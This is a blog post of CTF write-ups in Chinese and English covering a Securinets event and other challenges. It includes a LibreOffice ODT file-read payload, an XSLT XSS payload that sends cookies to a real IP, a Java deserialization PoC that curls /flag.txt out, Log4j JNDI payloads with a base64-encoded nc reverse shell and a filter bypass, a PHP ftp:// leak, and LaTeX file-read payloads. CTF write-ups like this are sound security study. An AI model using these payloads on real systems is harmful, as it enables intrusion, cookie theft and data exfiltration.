Y0ng的博客
0%

securinets-CTF

发表于 更新于 分类于

image-20220411121534123

Document-Converter

  • libreOffice
  • PDF

https://10nf0x.medium.com/egctf-2019-final-secure-document-portal-v2-70c1e23110f3

https://buer.haus/2019/10/18/a-tale-of-exploitation-in-spreadsheet-file-conversions/

libreOffice 漏洞,题目是可以上传doc、jpg、gif,转为pdf,根据文章操作即可

image-20220410210307931

插入OLE对象,这里需要文件存在,linux机器不用这样,直接/flag即可

image-20220410210547459

image-20220410210723985

保存为odt,然后改名为doc

image-20220410210806550

用压缩软件打开,修改url为file协议

image-20220410210910054

然后发现只能读两三行,作者也给了payload

<text:section text:name="string">
<text:section-source xlink:href="file:///flag" xlink:type="simple" xlink:show="embed" xlink:actuate="onLoad"/>
</text:section>

image-20220410212313201

Securinets{1t_was_So_easy!!!}

planetsheet

  • XSLT
  • XSS

题目为xss类型,有报告页面

image-20220411092558060

然后测试的时候发现页面不对劲,不是正常的html,然后通过搜索关键字xsl,发现使用了一种xslt的技术,将xml转为了xhtml

image-20220411092845642

然后我搜索了相关不同 Content-Type 下的xss注入

https://github.com/BlackFan/content-type-research/blob/master/XSS.md

payload

<x:script xmlns:x="http://www.w3.org/1999/xhtml">window.open('http://1.116.110.61:4000'+document.cookie)</x:script>

BrokenParr0t

  • gadgetinspector

一道java反序列化题目,直接jd-gui分析或者在线网站 https://jdec.app/

这里对cookie进行base64解码然后存在反序列化操作,这里有一点不理解(Question)

image-20220411114006671

在utils.QuestionCompar对internal再次进行base64解码,然后compare函数中存在反序列化操作

image-20220411115758942

最后走到services.Author,控制使uuid的hashCode为0,就可代码执行

image-20220411115837865

也就是说要让 (Question)inp.readObject(); 走到QuestionCompar中并且调用compare方法,CC2链中使用PriorityQueue

调用任意的compare方法

poc

import com.securinets.services.Author;
import com.securinets.utils.QuestionCompar;
import java.io.* ;
import java.util.* ;
import java.lang.reflect.*;

class exploit
{
    public static void main(String[] args) throws Exception{
        Author author = new Author();
        //设置字段
        setFieldValue(author,"name","curl http://1.116.110.61:4000/ -d @/flag.txt");
        setFieldValue(author,"uuid","");
        //序列化
        ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
        ObjectOutputStream objectOutputStream = new ObjectOutputStream(byteArrayOutputStream);
        objectOutputStream.writeObject(author);
        objectOutputStream.close();
        //生成base64,用于二次decode
        String evilcode = Base64.getEncoder().encodeToString(byteArrayOutputStream.toByteArray());

        QuestionCompar questionCompar = new QuestionCompar();
        setFieldValue(questionCompar,"internal",evilcode);

        PriorityQueue priorityQueue = new PriorityQueue(2,questionCompar);
        priorityQueue.add(1);
        priorityQueue.add(1);
        
        serialize(priorityQueue);
    }

    public static void setFieldValue(Object object, String fieldName, Object value) throws Exception{
        Field field = object.getClass().getDeclaredField(fieldName);
        field.setAccessible(true);
        field.set(object, value);
    }

    public static void serialize(Object obj) throws Exception {
        ByteArrayOutputStream baos = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(baos);
        oos.writeObject(obj);
        oos.close();
        System.out.println(new String(Base64.getEncoder().encode(baos.toByteArray())));
    }
}

FLAG: Securinets{DouBlE_SeRiaLisAtion_AnD_J4Va_S0_Ann0yInG}

gadgetinspector 它是 Netflix 安全团队用于查找小工具链的 Java 字节码分析工具。它在白盒攻击中很有用,找链子的工具

NarutoKeeper

  • XSLeak

题目注册登录后有添加文章功能与模糊搜索功能与报告功能,flag在admin账户下的文章里,向admin报告vps上的evil html执行js代码,去使用搜索功能,逐个字符的控制,判断状态码,返回302,就是flag,然后再将数据外带

image-20220411142311563

flag的下一个字符为正确

image-20220411142338046

具体代码,不会写…

MISC

misc有几道log4j的bypass,第三道没有出,回头再补,感觉就是利用其他的两种方式,但是打了几次没回显

https://www.cnblogs.com/peace-and-romance/p/15717457.html

When I open the attachment,i found log4j

image-20220410191149698

Under login routing,Trigger log4j by username,so i try it by dnslog

${jndi:ldap://sl155b.dnslog.cn}

image-20220410191507712

Received an echo

image-20220410191545112

so I Generate payload as usual

java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 150.158.181.145

using command for reverse shell

//base64 code means reverse shell by using nc cmmand
${jndi:ldap://150.158.181.145:1389/Basic/Command/Base64/bmMgMS4xMTYuMTEwLjYxIDQwMDAgLWUgL2Jpbi9zaA==}

my vps recived and auto sending some payload

image-20220410192042663

Then nc my port for recive shell

image-20220410192213167

misc2 add some filter,i using this payload to bypass it

${${env:TEST:-j}ndi${env:TEST:-:}${env:TEST:-l}dap${env:TEST:-:}//150.158.181.145:1389/Basic/Command/Base64/(base64 code)}

sourcer

Hey, I’ve built a tool to view source code. Is it secure?

获取源码

<?php 
// Challenge by @gehaxelt.
include "config.php";

function showcode($file) {
    $source = show_source($file, true);
    print $source;
    exit(0);
}

if(isset($_GET['src'])) {
    showcode("index.php");
}

if(isset($_GET['file'])) {
    $file = $_GET['file'];
    if(str_contains($file, "..")) {
        die("No automated tools pls.");
    }

    if(!file_exists($file . FLAG . ".php")) {
        die("File not found :-/");
    }

    showcode($file);
}
?>

太明显了,file_exists去访问ftp,然后就将flag泄露了

//vps开启ftp
python3 -m pyftpdlib -p 21
//payload
?file=ftp://1.116.110.61:21/

image-20220408214545349

FLAG: ENO{F1L3_Exists_FTP_fun_in_PHP}

Texnology

Online LaTeX editors are quite famous now, but are the associated risks as well?

Hint: The flag is at /FLAG.

latex生成pdf文件,存在黑名单,找个读取的payload进行读取,但是这里貌似存在了非预期,没有控制大小写

\newread\file
\openin\file=/FLAg
\loop\unless\ifeof\file
    \read\file to\fileline 
    \text{\fileline}
\repeat
\closein\file

image-20220408235736621

在生成的pdf中发现flag

FLAG:ENO{L4T3x_H4ck1Ng_R3L04D3D_OK!}

Texnology (Fixed)

绕就完事了,def定义,然后变量拼接

payload

\def \fl {/FL}
\def \ag {AG.php}
\def \arg {\fl\ag}
\arg
\newread\file
\openin\file=\arg
\loop\unless\ifeof\file
    \read\file to\fileline 
    \fileline
\repeat
\closein\file

FLAG: ENO{L4T3x_H4ck1Ng_R3L04D3D_OK_N0t_BugGy_!}